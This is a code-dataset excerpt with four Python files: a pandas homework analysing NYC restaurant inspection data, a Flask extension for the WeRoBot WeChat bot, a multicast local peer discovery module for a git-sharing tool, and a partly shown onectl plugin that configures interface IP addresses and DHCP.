repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringlengths 1
5
| size
stringlengths 4
7
| content
stringlengths 475
1M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,293,591B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
wenduowang/git_home | python/MSBA/intro/HW2/HW2_wenduowang.py | 1 | 12556 |
# coding: utf-8
# In[1]:
from pandas import Series, DataFrame
import pandas as pd
import warnings
warnings.filterwarnings('ignore')
get_ipython().magic(u'pylab inline')
# # NYC Restaurants
# ### Read in data from csv, and check column names to keep in mind.
# In[2]:
restaurants = pd.read_csv("NYC_Restaurants.csv", dtype=unicode)
for index, item in enumerate(restaurants.columns.values):
print index, item
# ## Question 1: Create a unique name for each restaurant
# 1. Select `DBA`, `BUILDING`, `STREET` and `ZIPCODE` columns as a dataframe
# 2. Apply `apply()` function on the selected dataframe, which takes in the series of the dataframe.
# + inside the `apply()` function, use placeholders to indicate that 4 series will be taken at the same time.
# + it is possible to select each column and concatenate them together, though looks not DRY.
# In[3]:
#use .apply() method to combine the 4 columns to get the unique restaurant name
restaurants["RESTAURANT"] = restaurants[["DBA", "BUILDING", "STREET", "ZIPCODE"]]. apply(lambda x: "{} {} {} {}".format(x[0], x[1], x[2], x[3]), axis=1)
#incase that the RESTAURANT names contain spaces or symbols, strip off them
restaurants["RESTAURANT"] = restaurants["RESTAURANT"].map(lambda y: y.strip())
print restaurants["RESTAURANT"][:10]
# ## Question 2: How many restaurants are included in the data?
# Since each `RESTAURANT` appears appears only once in `value_count()` series, therefore applying `len()` will return the number of restaurants in the whole dataset.
# In[4]:
print "There are", len(restaurants.drop_duplicates(subset="RESTAURANT")["RESTAURANT"].value_counts()), "restaurants in the data."
# ## Question 3: How many chains are there?
# "Chains" are brands having at least 2 different `RESTAURANT`. After `drop_duplicates(subset="RESTAURANT")`, extracting`value_count()` on `DBA` will give how many `RESTAURANT` each `DBA` has. Converting each value into logical with evaluation `value_count()>=2` and then summing up the how series will give the number of `True` records, which is the number of chains.
# In[5]:
num_chain = sum(restaurants.drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()>=2)
print "There are", num_chain, "chain restaurants."
# ## Question 4: Plot a bar graph of the top 20 most popular chains.
# "Popularity" is here understood as number of `RESAURANT` of each `DBA`.
# 1. Extract the chain `DBA`
# 2. Define a helper function `chain` to identify if a given `DBA` is a chain.
# 3. Use the helper function to make a mask to select the chain `DBA`.
# 4. Apply the mask to the whole dataframe, and drop duplicate `RESTAURANT`, the `value_counts()` will give the number of locations of each `DBA`
# In[6]:
chains = restaurants.drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()[: num_chain].index.values
def chain(restaurant):
return (restaurant in chains)
mask = restaurants["DBA"].map(chain)
restaurants[mask].drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()[:20].plot(kind="bar")
# ## Question 5: What fraction of all restaurants are chains?
# To calculate the faction of chains among all restaurants, we use an inline mask on `DBA`(`True` if is chain). Summing up `True` values gives the number of chains. It is divided by the total number of unique `RESTAURANT` to get the fraction.
# In[7]:
print "The percentage of chain restaurants is",
print "{:.2%}".format(sum(restaurants.drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()>=2)/float(len(restaurants["RESTAURANT"].value_counts())))
# ## Question 6: Plot the number of non-chain restaurants in each boro.
# 1. In case "missing" is spelt differently, a helper function `lower_case` is defined to convert the string into lower case.
# 2. Use the `chain` helper function to make a mask selecting chains. Negative of this mask will return non-chains.
# 3. Use the `lower_case` function to select missing `BORO`.
# 4. Use the "negative" mask to select non-chains and remove duplicate `RESTAURANT`, and then remove missing `BORO`, `value_counts()` gives number of non-chains in each borough.
# In[8]:
def lower_case(X):
return X.lower()
mask_1 = restaurants["DBA"].map(chain)
mask_2 = restaurants["BORO"].map(lower_case) != "missing"
restaurants[-mask_1].drop_duplicates(subset="RESTAURANT")[mask_2]["BORO"].value_counts().sort_values(ascending=False).plot(kind="bar")
# ## Question 7: Plot the fraction of non-chain restaurants in each boro.
# The goal is to calculate the ratio of $\frac{N_{non-chain}}{N_{total}}$ within each borough.
#
# This fraction can be done between two series-`value_counts()` of non-chains of `BORO` (not missing) and `value_counts()` of all unique `RESTAURANT` of `BORO`.
#
# Depending on which borough has the highest ratio, a message will pop out to compare if it is the same with the borough with the most non-chains.
# In[9]:
series_tmp_1 = restaurants[mask_2].drop_duplicates(subset="RESTAURANT")["BORO"].value_counts()
series_tmp_2 = restaurants[-mask_1][mask_2].drop_duplicates(subset="RESTAURANT")["BORO"].value_counts()
series_tmp_ratio = series_tmp_2/series_tmp_1
series_tmp_ratio.sort_values(ascending=False).plot(kind="bar")
print "The highest non-chain/total ratio is:", "{:0.2%} ({})".format(series_tmp_ratio.sort_values(ascending=False)[0], series_tmp_ratio.sort_values(ascending=False).index.values[0])
if series_tmp_ratio.sort_values(ascending=False).index.values[0] !=restaurants[-mask_1].drop_duplicates(subset="RESTAURANT")[mask_2]["BORO"].value_counts().sort_values(ascending=False).index.values[0]:
print "It is not the same borough."
else:
print "It is the same borough."
# ## Question 8: Plot the popularity of cuisines.
# Drop duplicate `RESTAURANT` and plot on the top 20 of sorted `value_counts()` of `CUISINE DESCRIPTION.`
# In[10]:
restaurants.drop_duplicates(subset="RESTAURANT")["CUISINE DESCRIPTION"].value_counts() .sort_values(ascending=False)[:20].plot(kind="bar")
# ## Question 9: Plot the cuisines among restaurants which never got cited for violations.
# Here we used a mask to sift out the restaurants whose `VIOLATION CODE` is missing.
# In[18]:
non_clean_restaurants = restaurants[-restaurants["VIOLATION CODE"].isnull()]["RESTAURANT"].value_counts().index.values
def is_clean(restaurant, blacklist=non_clean_restaurants):
return restaurant not in blacklist
mask_clean = restaurants["RESTAURANT"].map(is_clean)
restaurants[mask_clean]["CUISINE DESCRIPTION"].value_counts().sort_values(ascending=False)[:20].plot(kind="bar")
# ## Question 10: What cuisines tend to be the “cleanest”?
# 1. Make a series of all cuisines with 20 or more serving records in non-duplicate restaurants.
# 2. Define a helper function to determine if a given cuisine is in the series above.
# 3. Make a mask for the most served cuisines.
# 4. Apply that mask and the "non violation" mask in Q9 to produce a `value_counts()` series, containing the non-violation records for those cuisines.
# 5. Apply the newly defined mask to the whole DataFrame and produce another `value_counts()` containing how many inspections were done for the most served cuisines.
# 6. Divide the two series and get a new series of the format $cuisine:\ \frac{N_{non-violation}}{N_{total\ inspection}}$.
# 7. Plot the first 10 elements.
# In[12]:
top_cuisine_series = restaurants.drop_duplicates(subset=["RESTAURANT","CUISINE DESCRIPTION"])["CUISINE DESCRIPTION"].value_counts()
def is_top_cuisine(cuisine):
return top_cuisine_series[cuisine]>=20
mask_3 = restaurants["VIOLATION CODE"].isnull()
mask_4 = restaurants["CUISINE DESCRIPTION"].map(is_top_cuisine)
series_tmp_3 = restaurants[mask_4][mask_3]["CUISINE DESCRIPTION"].value_counts()
series_tmp_4 = restaurants[mask_4]["CUISINE DESCRIPTION"].value_counts()
(series_tmp_3/series_tmp_4).sort_values(ascending=False)[:10].plot(kind="bar")
# ## Question 11: What are the most common violations in each borough?
# 1. Use `crosstab` to create a dataframe with `VIOLATION DESCRIPTION` as index, and `BORO` (without "Missing" boroughs) as columns. `dropna` is set `True` so `NaN` will not be recorded.
# 2. Every cell in the `crosstab` is the number of occurences of a violation in a certain borough. `idxmax()` method is applied to automatically retrieve the max occurence for each `BORO`.
# In[13]:
violation_boro_tab = pd.crosstab(
index=restaurants["VIOLATION DESCRIPTION"],
columns=restaurants[restaurants["BORO"]!="Missing"]["BORO"],
dropna=True
)
print "The most common violation in each borough is summarised below:"
violation_boro_tab.idxmax()
# ## Question 12: What are the most common violations per borough, after normalizing for the relative abundance of each violation?
# 1. Use `apply()` function to apply `lambda x: x.map(float)/violation_frequency_series, axis=0` on each column of the above `crosstab`. The resulting series gives _normalized_ violation frequency.
# + `float()` ensures the division returns fraction.
# + The denominator is a series of the `value_counts()` of all `VIOLATION DESCRIPTION`.
# In[14]:
violation_frequency_series = restaurants["VIOLATION DESCRIPTION"].value_counts()
violation_boro_norm_tab = violation_boro_tab.apply(lambda x: x.map(float)/violation_frequency_series, axis=0)
print "After normalization, the most common violation in each borough is summarised below:"
violation_boro_norm_tab.idxmax()
# ## Question 13: How many phone area codes correspond to a single zipcode?
# 1. Create a new column `AREA` to store the first 3 digits of `PHONE`, which is the area code.
# 2. Drop duplicate rows with the same combination of `AREA` and `ZIPCODE`.
# 3. By `value_counts()==1` each `AREA` with a single `ZIPCODE` will return `True`.
# 4. Sum up `True` values to return the total number of such area codes.
# In[15]:
restaurants["AREA"] = restaurants["PHONE"].map(lambda x: x[:3])
print "There are",
print sum(restaurants.drop_duplicates(subset=["AREA", "ZIPCODE"])["AREA"].value_counts() == 1),
print "area codes corresponding to only 1 zipcode"
# ## Question 14: Find common misspellings of street names
# 1. `map` `str.split()` function on `STREET` to breakdown the string into a list of words, and take the last word as `STREET TYPE`.
# 2. Take the remaining words and join them together as `STREET BASE`.
# 3. Concatenate `STREET BASE` and `STREET TYPE` together as `STREET BASE & ZIP`, spaced with empty space.
# 4. Create a new dataframe by `concat` the above 3 series. `axis=1` meaning concatenating horizontally.
# 5. Remove duplicate records from the new dataframe, where `STREET BASE` is not empty.
# 6. Merge the new dataframe with itself to get cross-matched `STREET TYPE`.
# 7. Only keep rows where the two `STREET TYPE` are different.
# 8. Make another `crosstab` on the merged dataframe with one `STREET TYPE` as index and the other as columns.
# 9. In the new `crosstab`, the occurences of alternative `STREET TYPE` are recorded in cells, whose max occurence can be obtained with `idxmax`.
# In[16]:
restaurants["STREET TYPE"] = restaurants["STREET"].map(lambda s: s.split()[-1])
restaurants["STREET BASE"] = restaurants["STREET"].map(lambda s: " ".join(s.split()[:-1]))
restaurants["STREET BASE & ZIP"] = restaurants["STREET BASE"].map(lambda s: s+" ") + restaurants["ZIPCODE"]
new_dataframe = pd.concat(
[restaurants["STREET BASE"], restaurants["STREET TYPE"], restaurants["STREET BASE & ZIP"]],
axis=1
)
new_dataframe = new_dataframe[new_dataframe["STREET BASE"].map(lambda s: len(s)>0)].drop_duplicates()
merged_new_dataframe = pd.merge(
new_dataframe,
new_dataframe,
left_on="STREET BASE & ZIP",
right_on="STREET BASE & ZIP",
suffixes=[" 1", " 2"]
)
merged_new_dataframe = merged_new_dataframe[merged_new_dataframe["STREET TYPE 1"] != merged_new_dataframe["STREET TYPE 2"]]
street_name = pd.crosstab(
index=merged_new_dataframe["STREET TYPE 1"],
columns=merged_new_dataframe["STREET TYPE 2"],
dropna=True
)
print "The most common alias for each of the following street type is listed"
street_name.idxmax()[
["AVE", "ST", "RD", "PL", "BOULEARD", "BOULEVARD"]
]
| gpl-3.0 | -8,672,267,729,537,924,000 | 47.651163 | 368 | 0.703155 | false |
whtsky/Flask-WeRoBot | flask_werobot.py | 1 | 3402 | #coding=utf-8
"""
Flask-WeRoBot
---------------
Adds WeRoBot support to Flask.
:copyright: (c) 2013 by whtsky.
:license: BSD, see LICENSE for more details.
Links
`````
* `documentation <https://flask-werobot.readthedocs.org/>`_
"""
__version__ = '0.1.2'
from werobot.robot import BaseRoBot
from flask import Flask
class WeRoBot(BaseRoBot):
"""
给你的 Flask 应用添加 WeRoBot 支持。
你可以在实例化 WeRoBot 的时候传入一个 Flask App 添加支持: ::
app = Flask(__name__)
robot = WeRoBot(app)
或者也可以先实例化一个 WeRoBot ,然后通过 ``init_app`` 来给应用添加支持 ::
robot = WeRoBot()
def create_app():
app = Flask(__name__)
robot.init_app(app)
return app
"""
def __init__(self, app=None, endpoint='werobot', rule=None, *args, **kwargs):
super(WeRoBot, self).__init__(*args, **kwargs)
if app is not None:
self.init_app(app, endpoint=endpoint, rule=rule)
else:
self.app = None
def init_app(self, app, endpoint='werobot', rule=None):
"""
为一个应用添加 WeRoBot 支持。
如果你在实例化 ``WeRoBot`` 类的时候传入了一个 Flask App ,会自动调用本方法;
否则你需要手动调用 ``init_app`` 来为应用添加支持。
可以通过多次调用 ``init_app`` 并分别传入不同的 Flask App 来复用微信机器人。
:param app: 一个标准的 Flask App。
:param endpoint: WeRoBot 的 Endpoint 。默认为 ``werobot`` 。
你可以通过 url_for(endpoint) 来获取到 WeRoBot 的地址。
如果你想要在同一个应用中绑定多个 WeRoBot 机器人, 请使用不同的 endpoint .
:param rule:
WeRoBot 机器人的绑定地址。默认为 Flask App Config 中的 ``WEROBOT_ROLE``
"""
assert isinstance(app, Flask)
from werobot.utils import check_token
from werobot.parser import parse_user_msg
from werobot.reply import create_reply
self.app = app
config = app.config
token = self.token
if token is None:
token = config.setdefault('WEROBOT_TOKEN', 'none')
if not check_token(token):
raise AttributeError('%s is not a vailed WeChat Token.' % token)
if rule is None:
rule = config.setdefault('WEROBOT_ROLE', '/wechat')
self.token = token
from flask import request, make_response
def handler():
if not self.check_signature(
request.args.get('timestamp', ''),
request.args.get('nonce', ''),
request.args.get('signature', '')
):
return 'Invalid Request.'
if request.method == 'GET':
return request.args['echostr']
body = request.data
message = parse_user_msg(body)
reply = self.get_reply(message)
if not reply:
return ''
response = make_response(create_reply(reply, message=message))
response.headers['content_type'] = 'application/xml'
return response
app.add_url_rule(rule, endpoint=endpoint,
view_func=handler, methods=['GET', 'POST'])
| bsd-3-clause | 2,627,483,782,171,116,500 | 28.490196 | 81 | 0.560838 | false |
mct/kohorte | p2p/lpd.py | 1 | 5112 | #!/usr/bin/env python
# vim:set ts=4 sw=4 ai et:
# Kohorte, a peer-to-peer protocol for sharing git repositories
# Copyright (c) 2015, Michael Toren <[email protected]>
# Released under the terms of the GNU GPL, version 2
import socket
import struct
import time
import base64
import os
import swarm
import peer
import config
from eventloop import EventLoop
from util import *
class LPD(object):
'''
Sends and receives Local Peer Discovery multicast messages. Will attempt
to re-open the socket periodically on socket errors, which happen with some
frequency if your wireless connection goes up and down, or if you suspend
and resume your laptop, etc.
'''
index = []
def __repr__(self):
return "LPD()"
def __init__(self, port, announce_time=600, sock_attempt_time=5):
if self.index:
raise Exception("An instance already exists?")
self.port = port
self.announce_time = announce_time
self.sock_attempt_time = sock_attempt_time
self.last_sock_attempt = 0
self.sock = None
self.open_socket()
self.index.append(self)
EventLoop.register(self)
def close(self):
raise Exception("Something terrbile has happened, listener was asked to close")
def wants_readable(self):
if self.sock:
return True
def wants_writable(self):
return False
def fileno(self):
return self.sock.fileno()
def open_socket(self):
if self.sock:
print timestamp(), self, "Double call to open_socket()? self.sock ==", repr(self.sock)
return
if time.time() - self.last_sock_attempt < self.sock_attempt_time:
return
self.last_sock_attempt = time.time()
mreq = struct.pack("4sl", socket.inet_aton(config.mcast_grp), socket.INADDR_ANY)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.INADDR_ANY)
sock.bind((config.mcast_grp, config.mcast_port))
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
except socket.error as e:
print timestamp(), self, "Error opening socket, will try again later:", e
else:
self.sock = sock
self.last_announce = 0
print timestamp(), self, "Listening"
def show(self, inbound, buf, comment=''):
if inbound:
direction = '<--'
else:
direction = '-->'
print timestamp(), self, direction, repr(buf), comment
def on_heartbeat(self):
if not self.sock:
self.open_socket()
if not self.sock:
return
if time.time() - self.last_announce < self.announce_time:
return
self.last_announce = time.time()
for s in swarm.Swarm.list():
buf = '%s %s %d %s' % (s.sha, my_ip(), self.port, peer.Peer.my_peerid)
try:
self.sock.sendto(buf, 0, (config.mcast_grp, config.mcast_port))
except socket.error as e:
print timestamp(), self, "sendto error, will try opening socket again later:", e
self.sock.close()
self.sock = None
self.last_sock_attempt = time.time()
return
else:
self.show(False, buf)
def on_readable(self):
try:
buf = self.sock.recv(1024)
except socket.error as e:
print timestamp(), self, "recv error, will try opening socket again later:", e
self.sock.close()
self.sock = None
self.last_sock_attempt = time.time()
return
try:
sha, host, port, remote_peerid = buf.split()
port = int(port)
addr = ((host, port))
except Exception as e:
self.show(True, buf, '# Not LPD message, ignoring: ' + str(e))
return
if remote_peerid == peer.Peer.my_peerid:
self.show(True, buf, '# Our own, ignoring')
return
s = swarm.Swarm.get(sha)
if not s:
self.show(True, buf, '# Unknown swarm')
return
if [ x for x in peer.Peer.list() if x.swarm == s and x.remote_peerid == remote_peerid ]:
self.show(True, buf, '# Already connected')
return
self.show(True, buf)
print timestamp(), self, "Found peer for", sha, "at", addr
s.connect(addr, remote_peerid)
@classmethod
def update(cls):
'''
Force an update, e.g. when a Swarm is added
'''
if not cls.index:
return
x = cls.index[0]
x.last_announce = 0
x.last_sock_attempt = 0
x.on_heartbeat()
| gpl-2.0 | -2,690,505,147,343,241,700 | 29.795181 | 99 | 0.571987 | false |
louargantb/onectl | onectl/sources/templates/network/plugin_ip.py | 1 | 17408 | #!/usr/bin/python -u
# Name: fqn.plugin.name
from includes import pluginClass
from includes import ifconfig
from includes import ipvalidation
from includes import ipaddr
from includes import *
import os
import sys
import re
import subprocess
import time
import signal
class PluginControl(pluginClass.Base):
def setOptions(self):
''' Create additional argument parser options
specific to the plugin '''
dic = []
### OPTION: set
opt0 = {}
opt0['name'] = '--set'
opt0['metavar'] = 'param:VALUE'
opt0['action'] = 'store'
opt0['nargs'] = '+'
opt0['help'] = 'Configure device. Valid entries are dhcp or IPADDR/MASK'
dic.append(opt0)
### Additional options, the line below is mandatory for bash autocompletion
### OPTION: ip
opt1 = {}
opt1['name'] = '--ip'
opt1['metavar'] = 'IPADDR'
opt1['action'] = 'store'
#opt1['nargs'] = '?'
opt1['help'] = 'Set IP address. Use dhcp key word to use dhcp mode.'
dic.append(opt1)
### OPTION: mask
opt2 = {}
opt2['name'] = '--mask'
opt2['metavar'] = 'NETMASK'
opt2['action'] = 'store'
#opt2['nargs'] = '?'
opt2['help'] = 'Set Netmask address.'
dic.append(opt2)
### __OPTION: gate
#opt3 = {}
#opt3['name'] = '--gate'
#opt3['metavar'] = 'GATEWAY'
#opt3['action'] = 'store'
##opt3['nargs'] = '?'
#opt3['help'] = 'Set Gateway address.'
#dic.append(opt3)
return dic
def info(self):
''' MANDATORY !'''
title = "IP configuration"
msg = "\n"
msg += "--set IPADDR/MASK : Take an ip address and a mask to set the device.\n"
msg += " The 'dhcp' keyword can also be used for dynamic IP configuration.\n"
msg += " eg: --set 192.168.1.1/24 \n"
msg += " or: --set dhcp \n"
msg += ' To unset an interface ip you can use either "0.0.0.0/0" or "none".\n'
msg += " \n"
msg += "--ip IPADDR : Modify the IP address\n"
msg += "--mask NETMASK : Modify the netmask (eg --mask 255.255.255.0) \n"
msg += "NB: An interface must first be activated before being able to proceed with its configuration.\n"
self.output.help(title, msg)
def inputValidation(self, data):
''' TO OVERWRITE IN PLUGINS -- MANDATORY --
In this function, plugin creator must implement a data input validator
If input is valid then the function must return 0, else it must return 1
This function is automatically called, there is no need to call it within <set> function.
'''
data_res = None
errmsg = ""
data = self.getBoundValue(data)
self.output.debug("Validating "+str(data))
if len(data) == 1:
err = False
if not data[0]:
data[0] = 'none'
if data[0] == 'dhcp':
self.output.debug(str(data)+" validated")
return data
else:
if data[0] == 'none':
data[0] = '0.0.0.0/0'
if re.search('/', data[0]):
tmp = data[0].split('/')
ip = tmp[0]
mask = tmp[1]
if not ipvalidation.is_ipv4(ip):
err = True
errmsg = ip+" is not in a valid format! Aborting."
try:
if not int(mask) in range(0,33):
err = True
errmsg = "mask "+str(mask)+" is not in a valid format! Aborting."
except:
if ipvalidation.is_ipv4(mask):
ipv4 = ipaddr.IPv4Network(ip+'/'+mask)
newmask = int(ipv4.prefixlen)
data = [ip+'/'+str(newmask)]
else:
err = True
errmsg = "mask "+str(mask)+" is not in a valid format! Aborting."
if not err:
data_res = data
else:
errmsg = data[0]+" is not in a valid format! Aborting."
err = True
else:
valid_params = ['ip', 'netmask']
err = False
netmask = ""
ip = ""
for entry in data:
if not err:
if not re.search(':', entry):
err = True
errmsg = "Data input is incorrect! Aborting."
if not err:
infos = entry.split(':')
if infos[0] not in valid_params:
err = True
errmsg = str(infos[0])+" is not a valid parameter! Aborting."
else:
valid_params.pop(valid_params.index(infos[0]))
if infos[0] == "ip":
ip = infos[1]
elif infos[0] == "netmask":
netmask = infos[1]
if not err:
if not ipvalidation.is_ipv4(infos[1]):
err = True
errmsg = str(infos[1])+" is not in a valid format! Aborting."
if err:
#self.log.error(errmsg)
self.output.error(errmsg)
if 'ip' in valid_params or 'netmask' in valid_params:
err = True
errmsg = "IP and Netmask parameters must be filled."
else:
ipv4 = ipaddr.IPv4Network(ip+'/'+netmask)
mask = int(ipv4.prefixlen)
data_res = [ip+'/'+str(mask)]
if err:
#self.log.error(errmsg)
self.output.error(errmsg)
self.output.debug(str(data_res)+" validated")
return data_res
def get_boot(self):
''' Get the boot IP '''
dev = self._get_device_name()
dev_ip=''
dev_mask=''
if os.path.exists('/etc/sysconfig/network-scripts/ifcfg-' + dev):
lines = open('/etc/sysconfig/network-scripts/ifcfg-' + dev, 'r').readlines()
for aline in lines:
if re.search("^ *#", aline) or re.search("^ *!", aline) or re.search("^ *;", aline):
continue
if re.search('^IPADDR=', aline):
config_args = aline.split('=', 1)
if not config_args:
continue
if 'IPADDR' in config_args[0]:
dev_ip=config_args[1].strip()
dev_ip = re.sub(r'^"|"$|\n|\r', '',dev_ip)
if re.search('^NETMASK=', aline):
config_args = aline.split('=', 1)
if not config_args:
continue
if 'NETMASK' in config_args[0]:
dev_mask=config_args[1].strip()
dev_mask = re.sub(r'^"|"$|\n|\r', '', dev_mask)
if dev_ip and dev_mask:
break
if ipvalidation.is_ipv4(dev_ip) and ipvalidation.is_ipv4(dev_mask):
ipv4 = ipaddr.IPv4Network(dev_ip+'/'+dev_mask)
dev_mask = int(ipv4.prefixlen)
ipv4 = dev_ip+'/'+str(dev_mask)
else:
ipv4 = "0.0.0.0/0"
#return ipv4
self.output.info(ipv4)
return 0
def get_active(self):
try:
''' MANDATORY !
define how to retreive the running config '''
dev = self._get_device_name()
dhclient_pid = self._dhclient_running(dev)
netlib = ifconfig.Interface()
ip = str(netlib.get_ip(dev))
mask = str(netlib.get_netmask(dev))
if ip != "None":
ipv4 = ipaddr.IPv4Network(ip+'/'+mask)
netmask = str(ipv4.netmask)
else:
ip = "None"
netmask = "None"
if dhclient_pid:
output='dhcp'
else:
if ip == "None":
ip = "0.0.0.0"
output=ip+'/'+mask
except:
raise
return output
def get(self):
try:
''' MANDATORY !
define how to retreive the running config '''
dev = self._get_device_name()
dhclient_pid = self._dhclient_running(dev)
netlib = ifconfig.Interface()
ip = str(netlib.get_ip(dev))
mask = str(netlib.get_netmask(dev))
mac = str(netlib.get_mac(dev))
if ip != "None":
ipv4 = ipaddr.IPv4Network(ip+'/'+mask)
netmask = str(ipv4.netmask)
else:
ip = "None"
netmask = "None"
self.output.title(dev+': HWaddr '+mac+'; IP:'+ip+'; Mask:'+netmask)
if dhclient_pid:
self.output.info("dhcp")
else:
if ip == "None":
ip = "0.0.0.0"
self.output.info(ip+'/'+mask)
except:
err = str(sys.exc_info()[1])
#self.log.error("getting "+self.PluginName+": "+err)
self.output.error(err)
return 1
return 0
def set(self, data):
''' MANDATORY !
define how to set the plugin with "data" '''
try:
# Set IP active
self.set_active(data)
# Set the boot IP
self.set_boot(data)
except:
err = str(sys.exc_info()[1])
#self.log.error("setting "+self.PluginName+" "+data+": "+err)
self.output.error(err)
return 1
self.output.title(self.PluginName+' correctly set.')
self.output.info(self.listToString(data))
return 0
def set_active(self, data):
''' Set the active config only '''
try:
if not self.live_update:
return 0
dev = self._get_device_name()
netlib = ifconfig.Interface()
if self.live_update:
# Check if device is a slaved interface.
if netlib.is_bond_slave(dev):
self.output.error(dev+' is part of a bond')
self.output.error('You cannot assign an IP to a slaved interface.')
return 1
if data[0] == 'dhcp':
self.output.debug("Setting DHCP client")
if self.live_update :
# Start dhclient
self.output.debug("starting dhclient")
dhclient_pid = self._dhclient_running(dev)
if dhclient_pid:
os.kill(int(dhclient_pid), signal.SIGKILL)
time.sleep(5)
self._start_dhclient(dev)
else:
self.output.debug("setting "+data[0])
tmp = data[0].split('/')
infos = {}
infos['ip'] = tmp[0]
infos['mask'] = tmp[1]
ipv4 = ipaddr.IPv4Network(infos['ip']+'/'+infos['mask'])
infos['netmask'] = str(ipv4.netmask)
if self.live_update :
# Kill dhclient process if needed
dhclient_pid = self._dhclient_running(dev)
if dhclient_pid:
os.kill(int(dhclient_pid), signal.SIGKILL)
if self.live_update :
# set running configuration:
self.output.debug("call set_ip "+infos['ip']+" to "+dev)
netlib.set_ip(infos['ip'], dev)
if infos['mask'] != "0":
self.output.debug("call set_maskip "+infos['mask']+" to "+dev)
netlib.set_netmask(int(infos['mask']), dev)
except:
err = str(sys.exc_info()[1])
self.output.error(err)
return 1
return 0
def set_boot(self, data):
''' Set the boot IP only '''
try:
dev = self._get_device_name()
netlib = ifconfig.Interface()
if self.live_update:
# Check if device is a slaved interface.
if netlib.is_bond_slave(dev):
self.output.error(dev+' is part of a bond')
self.output.error('You cannot assign an IP to a slaved interface.')
return 1
ifcfg_lines = []
tmp_lines = []
if os.path.exists('/etc/sysconfig/network-scripts/ifcfg-'+dev):
tmp_lines = open('/etc/sysconfig/network-scripts/ifcfg-'+dev, 'r').readlines()
if data[0] == 'dhcp':
self.output.debug("Setting DHCP client")
if tmp_lines:
proto_set = False
for line in tmp_lines:
toadd = True
if re.search('^BOOTPROTO=', line):
line = 'BOOTPROTO="dhcp"\n'
proto_set = True
elif re.search('^IPADDR=', line):
toadd = False
elif re.search('^NETMASK=', line):
toadd = False
elif re.search('^GATEWAY=', line):
toadd = False
if toadd:
ifcfg_lines.append(line)
if not proto_set:
ifcfg_lines.append('BOOTPROTO="dhcp"\n')
else:
ifcfg_lines.append('DEVICE="'+dev+'"\n')
ifcfg_lines.append('BOOTPROTO="dhcp"\n')
ifcfg_lines.append('ONBOOT="yes"\n')
else:
self.output.debug("setting "+data[0])
tmp = data[0].split('/')
infos = {}
infos['ip'] = tmp[0]
infos['mask'] = tmp[1]
ipv4 = ipaddr.IPv4Network(infos['ip']+'/'+infos['mask'])
infos['netmask'] = str(ipv4.netmask)
if infos['ip'] == "0.0.0.0":
plg_path = re.sub('.ip$', '', self.PluginFqn)
res = self.executePluginLater(plg_path+".gateway", "set", "none")
# set cold configuration
if tmp_lines:
ip_set = False
mask_set = False
proto_set = False
gw_set = False
for line in tmp_lines:
toadd = True
if re.search('^BOOTPROTO=', line):
line = 'BOOTPROTO="static"\n'
proto_set = True
elif re.search('^IPADDR=', line):
ip_set = True
if infos['ip'] != "0.0.0.0":
line = 'IPADDR="'+infos['ip']+'"\n'
else:
line = ''
elif re.search('^NETMASK=', line):
mask_set = True
if infos['mask'] != '0':
line = 'NETMASK="'+infos['netmask']+'"\n'
else:
line = ''
elif re.search('^GATEWAY=', line):
if infos.has_key('gateway'):
line = 'GATEWAY="'+infos['gateway']+'"\n'
gw_set = True
else:
toadd = False
if toadd:
ifcfg_lines.append(line)
if not proto_set:
ifcfg_lines.append('BOOTPROTO="static"\n')
if not ip_set and infos['ip'] != "0.0.0.0":
ifcfg_lines.append('IPADDR="'+infos['ip']+'"\n')
if not mask_set and infos['mask'] != '0':
ifcfg_lines.append('NETMASK="'+infos['netmask']+'"\n')
if infos.has_key('gateway') and not gw_set:
ifcfg_lines.append('GATEWAY="'+infos['gateway']+'"\n')
else:
ifcfg_lines.append('DEVICE="'+dev+'"\n')
ifcfg_lines.append('BOOTPROTO="static"\n')
if infos['ip'] != "0.0.0.0":
ifcfg_lines.append('IPADDR="'+infos['ip']+'"\n')
if infos['mask'] != '0':
ifcfg_lines.append('NETMASK="'+infos['netmask']+'"\n')
ifcfg_lines.append('ONBOOT="yes"\n')
if infos.has_key('gateway'):
ifcfg_lines.append('GATEWAY="'+infos['gateway']+'"\n')
open('/etc/sysconfig/network-scripts/ifcfg-'+dev, 'w').writelines(ifcfg_lines)
os.chmod('/etc/sysconfig/network-scripts/ifcfg-'+dev, 0440)
except:
err = str(sys.exc_info()[1])
self.output.error(err)
return 1
return 0
def _dhclient_running(self, device):
ret = None
pid = ''
if os.path.exists('/var/run/dhclient-'+device+'.pid'):
with open('/var/run/dhclient-'+device+'.pid', 'r') as f:
pid = f.readline().strip()
if pid:
cmdline = ''
if os.path.exists('/proc/'+pid):
with open('/proc/'+pid+'/cmdline', 'r') as f:
cmdline = f.readline()
if device in cmdline:
ret = pid
return ret
def _start_dhclient(self, device):
cmdline = '/sbin/dhclient -lf /var/lib/dhclient/dhclient-'+device+'.leases -pf /var/run/dhclient-'+device+'.pid '+device+' &'
os.system(cmdline)
def ip(self, data):
''' function associated with the option previously defined in getopts
You must have one function for each option '''
try:
if data == 'dhcp':
self.set([data])
else:
self.updateCurrentConfigNewValue(['ip:'+data])
except:
err = str(sys.exc_info()[1])
#self.log.error(self.PluginName+" --mask "+data+" : "+err)
self.output.error(err)
return 1
return 0
def mask(self, data):
''' function associated with the option previously defined in getopts
You must have one function for each option '''
try:
self.updateCurrentConfigNewValue(['netmask:'+data])
except:
err = str(sys.exc_info()[1])
#self.log.error(self.PluginName+" --mask "+data+" : "+err)
self.output.error(err)
return 1
return 0
def gate(self, data):
''' function associated with the option previously defined in getopts
You must have one function for each option '''
try:
self.updateKeyListEntry(['gateway:'+data])
except:
